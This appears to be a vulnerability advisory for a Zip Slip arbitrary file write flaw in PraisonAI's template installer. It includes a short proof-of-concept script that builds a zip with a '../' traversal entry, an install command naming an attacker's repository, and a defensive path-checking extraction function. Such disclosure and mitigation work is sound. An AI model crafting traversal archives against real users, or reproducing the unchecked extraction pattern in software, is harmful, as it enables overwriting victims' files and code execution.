PT-2026-30766 · Pypi · Praisonai
Published 2026-04-06 · Updated 2026-04-06 · CVE-2026-39307
CVSS v3.1: 8.1 (High) | AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H |
The PraisonAI templates installation feature is vulnerable to a "Zip Slip" arbitrary file write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's zipfile.extractall() without verifying whether the files within the archive resolve outside of the intended extraction directory.

Details
Location: src/praisonai/praisonai/cli/features/templates.py (Line 852)
Vulnerable code snippet:

    zip_ref.extractall(tmpdir)

During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using zip_ref.extractall(tmpdir). A specially crafted ZIP archive can contain file entries with relative paths (such as ../../../../tmp/evil.sh). If the archive is extracted on older Python versions or in environments where extraction rules aren't strict, extractall will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem.

PoC
- Generate a malicious zip payload:

    import zipfile

    # Create an archive whose single entry carries a relative traversal path
    with zipfile.ZipFile('malicious_template.zip', 'w') as z:
        # Adding a file that traverses directories
        z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')

- Trick a user into installing the malicious template:

    praisonai templates install github:attacker/malicious_template

- Observe the zip_slip_pwned.txt file created in /tmp/ on the victim's machine.
Impact
This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).
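A path-checked replacement for the extractall call described above, added here as an example; it is not PraisonAI's code and not the advisory's fix. It assumes the caller already holds the open ZipFile and the temporary directory, and the archive entries built in demo() are constructed sample data, never written outside the temporary directory:

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path

def unsafe_members(zf, dest):
    """Names of members that resolve outside `dest` once joined and resolved,
    which catches both '../' components and absolute member names."""
    root = Path(dest).resolve()
    bad = []
    for info in zf.infolist():
        target = (root / info.filename).resolve()
        if os.path.isabs(info.filename) or (target != root and root not in target.parents):
            bad.append(info.filename)
    return bad

def safe_extractall(zf, dest):
    """Drop-in replacement for zf.extractall(dest) that checks every member first."""
    bad = unsafe_members(zf, dest)
    if bad:
        raise ValueError("refusing to extract, members escape target dir: %r" % bad)
    zf.extractall(dest)

def build_zip(entries):
    """Build an in-memory archive from {name: content} (constructed sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, content in entries.items():
            z.writestr(name, content)
    return buf.getvalue()

def demo():
    """Run a benign template and a traversal archive through safe_extractall."""
    benign = build_zip({"template/agents.yaml": "framework: praisonai\n"})
    # Constructed traversal entry of the shape the advisory describes; only inspected.
    hostile = build_zip({"../../../../../../../tmp/zip_slip_pwned.txt": "x"})
    results = {}
    with tempfile.TemporaryDirectory() as tmpdir:
        with zipfile.ZipFile(io.BytesIO(benign)) as z:
            safe_extractall(z, tmpdir)
            results["benign_extracted"] = Path(tmpdir, "template", "agents.yaml").is_file()
        with zipfile.ZipFile(io.BytesIO(hostile)) as z:
            results["hostile_flagged"] = unsafe_members(z, tmpdir)
            try:
                safe_extractall(z, tmpdir)
                results["hostile_rejected"] = False
            except ValueError:
                results["hostile_rejected"] = True
    return results
```

Because the check runs before any write, it holds regardless of whether the interpreter's own extractall sanitises member paths.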
Fix

Weakness Enumeration
Relative Path Traversal

Related Identifiers

Affected Products
Praisonai